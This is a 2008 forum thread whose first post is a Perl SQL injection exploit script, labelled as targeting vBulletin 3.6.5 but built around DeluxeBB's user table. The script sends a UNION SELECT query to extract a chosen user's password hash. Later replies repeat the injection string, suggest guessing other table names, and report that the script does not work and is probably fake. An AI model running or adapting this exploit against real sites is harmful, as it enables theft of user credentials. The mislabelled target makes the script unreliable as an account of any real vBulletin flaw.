 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 330
 Members: 0
 Total: 330
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Vbulletin 3.6.5 Perl Sql Injection Exploit |
|
 Posted: Fri Aug 01, 2008 5:45 pm |
 |
|
| diehardshorty |
| Beginner |
 |
| |
| Joined: Aug 01, 2008 |
| Posts: 4 |
|
|
|
 |
|
 |
|
#!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
######################################################### |
|
|
|
|
|
|
|
|
| Posted: Fri Aug 29, 2008 2:12 pm |
|
|
| Yarr234 |
| Beginner |
|
| |
| Joined: Aug 29, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
Hi. I cannot get this working on 3.6.5
Can anybody verify it works? It can connect and send query fine but then the return is just --------------------------------------------------- etc etc |
|
|
|
|
| Posted: Fri Aug 29, 2008 11:52 pm |
|
|
| gibbocool |
| Advanced user |
 |
| |
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Well this is the sql injection string:
| Code: | "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='"
|
Have a play with it, maybe think of different database names. |
|
|
|
|
| Posted: Sun Aug 31, 2008 11:10 pm |
|
|
| Yarr234 |
| Beginner |
|
| |
| Joined: Aug 29, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
| Ah I see. So it is a guessing game with the database name... |
|
|
|
|
| Posted: Mon Sep 01, 2008 4:28 am |
|
|
| pexli |
| Valuable expert |
 |
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Shittt.Again.Guy's stop posting this bull shitt's here.This is fake. |
|
|
|
|
| Posted: Mon Sep 01, 2008 10:59 am |
|
|
| gibbocool |
| Advanced user |
|
| |
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
| koko wrote: | | Shittt.Again.Guy's stop posting this bull shitt's here.This is fake. |
Why do you think it's fake?
I agree though, it looks too simple for a vbulletin exploit. |
|
|
|
|
| Posted: Wed Jan 14, 2009 8:19 am |
|
|
| Reelix |
| Regular user |
|
| |
| Joined: Jan 06, 2009 |
| Posts: 20 |
|
|
|
|
|
|
|
| Possible Fake - Every User ID gives the identical hash |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
